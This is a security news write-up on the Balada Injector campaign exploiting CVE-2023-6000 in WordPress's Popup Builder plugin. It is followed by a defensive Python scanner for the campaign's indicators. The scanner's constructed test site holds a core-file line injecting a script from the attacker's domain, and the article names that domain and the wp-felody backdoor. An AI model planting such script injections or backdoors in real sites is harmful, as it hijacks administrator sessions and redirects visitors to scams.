A significant cybersecurity incident has come to light involving the Popup Builder plugin for WordPress, whose vulnerable versions are being exploited by the malware campaign known as Balada Injector. The issue endangers thousands of WordPress websites still running affected versions of the plugin.

Initially documented by Doctor Web at the beginning of 2023, this ongoing campaign exploits a series of security vulnerabilities in WordPress plugins, primarily targeting site administrators. This exploitation allows attackers to inject backdoors that redirect users from infected sites to fraudulent tech support pages, bogus lottery winnings, and various push notification scams.

Further research by Sucuri has revealed the expansive nature of this operation, identifying it as being active since 2017 and affecting upwards of one million websites. This alarming trend underscores the growing sophistication of cyber threats targeting widely used web platforms.

GoDaddy’s security unit has recently reported observing new Balada Injector activity on December 13, 2023, discovering malicious injections across more than 7,100 sites. The security breach exploits a critical vulnerability in Popup Builder, designated as CVE-2023-6000, with a CVSS score of 8.8. This plugin, which boasts over 200,000 active installations, had its vulnerability disclosed by WPScan just one day prior to the attack.

According to WPScan researcher Marc Montpas, the implications of this vulnerability are severe. When exploited, it grants the attacker the ability to execute any action permitted to a logged-in administrator, including the installation of unauthorized plugins and the creation of rogue administrative accounts.

The primary motive behind the Balada Injector campaign is to insert a malicious JavaScript file hosted on specialcraftbox[.]com. This file is designed to hijack control of the compromised website and load additional scripts to facilitate further malicious redirects. The attackers maintain persistent access by uploading backdoors, implementing harmful plugins, and establishing illicit administrator accounts.

The strategy specifically targets logged-in administrators: injected JavaScript runs in the administrator's browser and reuses their session cookies to perform administrative tasks without any additional authentication. In MITRE ATT&CK terms, this is a clear instance of initial access followed immediately by persistence.

Once triggered, the new wave of attacks uses the hijacked administrator session to deploy a backdoor plugin (“wp-felody.php”, or “Wp Felody”) that fetches a subsequent payload from the domain mentioned above. This payload is another backdoor dubbed “sasas,” which is temporarily stored and executed before being erased.

Ultimately, the attack modifies the site’s wp-blog-header.php file to reintegrate the original Balada JavaScript malware, allowing attackers to remain undetected while maintaining control. This level of manipulation reflects a deep understanding of WordPress architecture and the potential to exploit vulnerabilities for malicious purposes.
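The infection chain above leaves file-level indicators a site owner can check for: the wp-felody.php backdoor plugin, references to the specialcraftbox[.]com domain, and HTML/JavaScript injected into wp-blog-header.php, which in a clean install is pure PHP bootstrap code. The following Python scanner is an added example, not code from the article or from Sucuri/WPScan; it walks an install directory and reports those indicators, using a constructed sample tree for demonstration.

```python
import os
import re
import tempfile

# Indicators named in the write-up above: the backdoor plugin file/name,
# the domain hosting the injected script, and the modified core file.
BACKDOOR_FILENAME = "wp-felody.php"
BACKDOOR_PLUGIN_HEADER = re.compile(r"Plugin Name:\s*Wp Felody", re.IGNORECASE)
INJECT_DOMAIN = re.compile(r"specialcraftbox\.com", re.IGNORECASE)
CORE_FILE = "wp-blog-header.php"
SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)

def scan_wordpress_root(root):
    """Walk a WordPress install and return sorted (indicator, relative path) pairs."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            if name == BACKDOOR_FILENAME:
                findings.append(("backdoor-plugin-file", rel))
            if not name.endswith((".php", ".js")):
                continue
            with open(path, encoding="utf-8", errors="replace") as fh:
                content = fh.read()
            if BACKDOOR_PLUGIN_HEADER.search(content):
                findings.append(("backdoor-plugin-header", rel))
            if INJECT_DOMAIN.search(content):
                findings.append(("injected-domain-reference", rel))
            # wp-blog-header.php only bootstraps WordPress; any <script> tag in it is foreign.
            if name == CORE_FILE and SCRIPT_TAG.search(content):
                findings.append(("core-file-script-injection", rel))
    return sorted(findings)

def build_sample_site(root):
    """Write a constructed (not real) WordPress tree: one clean file and two tampered ones."""
    os.makedirs(os.path.join(root, "wp-content", "plugins", "wp-felody"))
    os.makedirs(os.path.join(root, "wp-includes"))
    samples = {
        "wp-includes/functions.php": "<?php\nfunction wp_example() { return 1; }\n",
        "wp-content/plugins/wp-felody/wp-felody.php":
            "<?php\n/*\nPlugin Name: Wp Felody\n*/\n// constructed stand-in, no real payload\n",
        "wp-blog-header.php":
            "<?php\nrequire_once __DIR__ . '/wp-load.php';\n"
            "echo '<script src=\"https://specialcraftbox.com/x.js\"></script>';\n",
    }
    for rel, body in samples.items():
        with open(os.path.join(root, rel), "w", encoding="utf-8") as fh:
            fh.write(body)

def demo():
    """Build the constructed sample site in a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_site(root)
        return scan_wordpress_root(root)

if __name__ == "__main__":
    for indicator, path in demo():
        print(f"{indicator}: {path}")
```

Run `scan_wordpress_root("/path/to/wordpress")` against a real document root; a hit on any indicator warrants checking for rogue administrator accounts and unknown plugins as well.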
